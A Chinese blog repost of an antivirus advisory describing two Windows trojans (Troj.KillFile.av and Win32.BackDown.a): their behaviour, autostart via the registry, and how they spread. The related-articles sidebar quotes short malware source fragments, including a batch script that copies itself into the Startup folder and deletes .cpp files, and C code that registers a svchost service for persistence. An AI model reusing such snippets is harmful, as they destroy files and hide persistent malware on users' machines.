破坏系统中可执行程序的木马病毒(转)

最新推荐文章于 2023-09-09 17:58:29 发布
最新推荐文章于 2023-09-09 17:58:29 发布
阅读量628 收藏 1
点赞数
文章标签: 操作系统
今日提醒用户特别注意以下病毒:“文件杀手变种av”(Troj.KillFile.av)和“BackDown变种a”(Win32.BackDown.a)。

  “文件杀手变种av”(Troj.KillFile.av)木马病毒,病毒运行后恶意破坏特定文件夹和子文件夹下的所有可执行文件,使用户机器系统遭受严重的破坏。

  “BackDown变种a”(Win32.BackDown.a)复合型病毒,运行后感染用户主机上的可执行文件。

  一、“文件杀手变种av”(Troj.KillFile.av) 威胁级别:中

  病毒特征:这是一个在Windows平台下破坏系统中可执行程序的木马病毒。

  发作症状:病毒运行时将自身复制为以下文件:
%Windir%helpWinHelpCenter.exe,添加以下注册表项,使病毒开机后自动运行。该病毒可恶意破坏特定文件夹和子文件夹下的所有可执行文件,用户重启机器后病毒继续破坏相关文件。病毒主要依靠欺骗或捆绑软件方式进行传播。

  二、“BackDown变种a”(Win32.BackDown.a) 威胁级别:低

  病毒特征:这是一个在Windows平台下的复合型病毒。

  发作症状:病毒运行后感染用户机器上的可执行文件。网络可用时,病毒通过网络下载并运行其它病毒程序。该病毒主要通过感染文件方式进行传播。

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10294527/viewspace-124100/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/10294527/viewspace-124100/

cuankuangzhong6373
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一分钟用WINRAR制作破坏系统的程序
weixin_33890526的博客
02-26 91
一分钟用WINRAR制作破坏系统的程序 WINRAR是众所周知的压缩工具,大家看到这个话题一定很感兴趣,下面它的一些另外功能还非常可观。 经过特定设置的自解压缩包不含有任何***或者病毒,可以自动删除解压缩的硬盘文件,甚至达到破坏系统的目的。 具体的操作步骤如下:首先右点要压缩的文件...
木马病毒能损害计算机硬盘么,电脑病毒或木马后有什么表现
weixin_29011395的博客
07-16 1382
目前计算机病毒的种类很多,计算机感染病毐后所表现出来的症状也各不相同。下面是学习啦小编跟大家分享的是电脑病毒或木马后有什么表现,欢迎大家来阅读学习。电脑病毒或木马后有什么表现方法/步骤1.计算机操作系统运行速度减慢或经常死机win7系统运行缓慢通常是计莽机的资源被大量消耗。有些病毒可以通过运行自己,强行占用大量内存资源,导致正常的系 统程序无资源可用,进而操作系统运行速度 减慢或死机。2.系统...
破坏性木马源程序
嗨!您好!Welcome my blog
10-29 1091
    首先,新建一工程,名为Server,新建一个窗体,Name为Server,在窗体加入一个winsock控件,Name设为sckServer,协议设为默认的TCP/IP协议。 接下来我们回来Server窗体模块,添加如下代码: Private Sub form_Load()   With Me    .sckServer.LocalPort = 88917本地端口(呵呵!我的生
木马可以损坏计算机硬件么,台式电脑总是自动重启怎么处理
weixin_39823459的博客
07-20 497
在生活关于台式电脑总是自动重启的问题,相信大家都曾遇到过,那么下面就由学习啦小编来给你们说说台式电脑总是自动重启的原因及处理方法吧,希望可以帮到你们哦!台式电脑总是自动重启的处理方法一:一、软件问题1.病毒 或木马“冲击波”等病毒发作造成的电脑经常自动启动。木马程序从远程控制你计算机的一切活动,包括让你的计算机重新启动。2.系统文件损坏系统文件被损坏,重装系统的时候还没有安装部署完成就强行启动造...
【GDC翻译】在“Control”学到的程序化破坏系统的经验
主要记录了工作之余胡乱学习的知识,大部分是入门级别的内容。 主要是为了自己未来有用到时能快速上手,相当于是个备忘录。 当然,也很开心其他人可以从中找到对自己有用的信息。^_^
07-25 483
0. 介绍 大家好,欢迎来到《从“Control”学到的程序化破碎的经验》。 我的名字是 Johannes Richter,我是 Remedy 的首席特效师。 我曾经在电影领域做过十多年的特效美术指导,在2019年进入了游戏领域。 对于 Remedy 其实不用过多介绍了,因为它已经很出名了。但对于那些不了解的人,我还是介绍一下吧。 我们在芬兰的Espoo。 二十多年来,Remedy一直以标志性的叙事驱动的动作游戏而闻名。比如《马克思佩恩》、《马克思佩恩2》、《量子破碎》,当然还有最近的《Contro
C++木马病毒的查杀设计与实现(含源码)
12-04
在IT行业木马病毒是计算机安全领域的一大挑战。C++作为一门强大的编程语言,被广泛用于编写各类软件,包括恶意软件。本话题主要探讨的是如何利用C++技术设计和实现一个木马病毒的查杀工具,这涉及到多个重要的...
病毒及木马程序.docx
06-27
良性病毒虽然不破坏系统,但会占用系统资源,而恶性病毒则可能导致严重后果。 为了对抗计算机病毒,我们需要理解其工作原理,学习检测和清除方法。这包括使用反病毒软件,定期更新病毒库,以及实施良好的网络安全...
在Linux系统清剿病毒.pdf
09-06
在Linux系统,尽管其安全性相对较高,但并非完全不受病毒威胁。病毒是无平台界限的,针对Linux的恶意软件确实存在,且可能对系统造成严重影响。为了应对这些威胁,Linux用户同样需要采取防范措施,其包括使用...
最新延边大学本科毕业论文_电脑木马病毒的研究与防范.doc
最新发布
06-28
这种类型的病毒通过伪装成正常程序来欺骗用户下载或安装,进而秘密地在用户的计算机系统执行恶意行为。与传统病毒不同的是,木马并不自我复制,而是通过网络连接或其他途径进行传播。 ### 木马病毒的特征 1. **...
超强C++木马病毒(含代码,样本)
yaosichengalpha的博客
07-05 7581
超强C++木马病毒(含代码,样本)
超强计算机病毒代码,木马编程 之超强服务... 附代码 原创.
weixin_42298039的博客
07-14 3646
该楼层疑似违规已被系统折叠隐藏此楼查看此楼}BOOL AddSvchostGroup(VOID){HKEY hkey;//其实是一个句柄.if(RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost",&hkey)!=ERROR_SUCCESS)return FALSE...
木马病毒代码1.0
2301_79273855的博客
09-09 2281
【代码】木马病毒代码1.0。
一个没有什么大害的小破坏程序
白话机器学习
05-27 511
功能是在系统目录下创建10000个txt文档。 当你打开系统目录时,如果电脑太慢,就可能会死机 #include "stdafx.h" #include #include int main(int argc, char* argv[]) { char Path[255]; char FileName[255]; char Data[512]="test content"; for(
提高系统运行速度,阻止木马病毒程序运行 软件限制策略
Tisty的兵工厂--新Blog:http://www.UbuntuSky.cn
11-26 3424
<!--google_ad_client = "pub-7058131363132249";/* 468x15, 创建于 08-6-3 */google_ad_slot = "4187223796";google_ad_width = 468;google_ad_height = 15;//--> 导读:   目的:提高系统运行速度,阻止木马病毒程序运行。   
简易木马病毒缩写
donglin67的博客
02-07 4087
一个简单木马例子 #include <windows.h> #include <winable.h> #include <stdio.h> #include <tchar.h> void virus(){ DWORD dwWallPaperStyle=2; int iRet; HKEY hkey; //执行文件所在路径 TCHAR szPath[MAX_PATH]={0}; GetModuleFileNam...
木马病毒代码
热门推荐
m0_65955912的博客
01-21 1万+
这个病毒的功能是删除当前目录下.cpp类型的代码。 copy %0 "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" copy %0 d:\ copy %0 e:\ del *.cpp attrib +h %0 1.病毒启动测试: copy %0 "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
office软件的宏病毒和木马病毒分析
"病毒分析和防范" 本文将从病毒分析的角度,深入探讨宏病毒、文件型病毒和木马...宏病毒、文件型病毒和木马病毒都是计算机病毒非常危险的类型,需要用户和计算机管理员采取有效的防范措施来保护计算机系统的安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值